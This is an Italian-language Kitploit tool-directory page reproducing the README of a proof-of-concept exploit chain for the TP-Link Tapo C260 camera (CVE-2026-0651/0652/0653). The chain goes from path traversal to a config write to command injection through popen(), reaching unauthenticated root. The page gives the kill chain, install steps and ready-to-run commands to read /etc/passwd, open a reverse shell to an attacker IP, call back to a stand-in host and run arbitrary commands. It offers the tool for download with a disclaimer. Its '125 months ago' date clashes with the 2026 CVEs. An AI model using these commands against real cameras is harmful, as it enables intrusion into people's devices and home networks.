Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
tapo-c260-rce — Catena di exploit PoC per la telecamera TP-Link Tapo C260 — CVE-2026-0651/0652/0653. Ricerca di @spaceraccoon. | Kitploit
Strumenti/GitHubGitHub/l0lsec/tapo-c260-rce
Sicurezza Sistemi EmbeddedSicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebHacking HardwarePenetration TestingCommand and ControlSicurezza Hardware e IoTAnalisi del Firmware
GitHub
125 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
l0lsec/tapo-c260-rce

tapo-c260-rce

Catena di exploit PoC per la telecamera TP-Link Tapo C260 — CVE-2026-0651/0652/0653. Ricerca di @spaceraccoon.

Vedi Repository

Catena RCE Tapo C260 (CVE-2026-0651 / CVE-2026-0652 / CVE-2026-0653)

Proof-of-concept della catena di exploit per la telecamera IP TP-Link Tapo C260 che consente di ottenere RCE da non autenticato a root concatenando tre vulnerabilità scoperte da Eugene Lim (Spaceraccoon).

Crediti

Tutta la ricerca e la scoperta delle vulnerabilità è di Eugene Lim (@spaceraccoon).

Questo repository è un'implementazione PoC basata sul suo writeup pubblico. Se lo trovi utile, compra il suo libro: From Day Zero to Zero Day: A Hands-On Guide to Vulnerability Research (No Starch Press).

Catena di Vulnerabilità

CVETipoImpatto
CVE-2026-0651Path Traversal / Divulgazione di File LocaliLegge file arbitrari tramite /%2e%2e%2f nel gestore HTTP GET
CVE-2026-0652Scrittura Config ArbitrariaGli utenti di livello guest possono scrivere in qualsiasi percorso di configurazione tramite manipolazione delle chiavi JSON nell'API cloud
CVE-2026-0653Command Injection / Escalation dei Privilegiset_region_code_handle passa il valore di configurazione dev_name non sanificato a popen()

Kill Chain

root@kitploit:~
LFD (lettura config dispositivo) --> Scrittura Config (avvelena dev_name) --> Attiva gestore region code --> popen() --> shell

Requisiti

  • Python 3.8+
  • Accesso di rete alla telecamera (per LFD) oppure un token di autenticazione cloud TP-Link valido (per RCE)
  • Credenziali di livello guest sono sufficienti per l'intera catena

Installazione

root@kitploit:~
git clone https://github.com/<you>/tapo-c260-rce.git
cd tapo-c260-rce
pip install -r requirements.txt

Utilizzo

Divulgazione di File Locali (CVE-2026-0651)

Legge file arbitrari da una telecamera sulla rete locale:

root@kitploit:~
python lfd.py --host 192.168.1.100 --token <stok_token> --file /etc/passwd

Catena RCE Completa (CVE-2026-0651 + CVE-2026-0652 + CVE-2026-0653)

root@kitploit:~
# Reverse shell
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --lhost <YOUR_IP> \
  --lport 4444

# Solo callback (ping curl)
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --callback http://your-server.com/pwned

# Comando personalizzato
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --cmd "id > /tmp/pwned"

Come Funziona

  1. Avvelenamento — Invia una richiesta setLedStatus con chiavi JSON manipolate che scrive un payload con metacaratteri di shell nel percorso di configurazione tp_manage/info/dev_name sul dispositivo.

  2. Attivazione — Invia una richiesta set_region_code. Il gestore legge dev_name dalla configurazione e lo interpola in una chiamata popen() senza sanificazione, eseguendo il comando iniettato.

  3. Shell — L'attaccante riceve un callback o una reverse shell.

Firmware Interessato

  • TP-Link Tapo C260 (firmware pre-patch)
  • Potenzialmente altri modelli Tapo che condividono lo stesso binario omnibus /bin/main

Disclaimer

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. Gli autori non sono responsabili per un uso improprio. Ottieni sempre il permesso esplicito prima di testare qualsiasi dispositivo che non possiedi.

Riferimenti

  • Writeup Originale — Spaceraccoon
  • Ricerca sul Protocollo Tapo di Kennedn
  • Advisory di Sicurezza TP-Link
Scarica lo strumento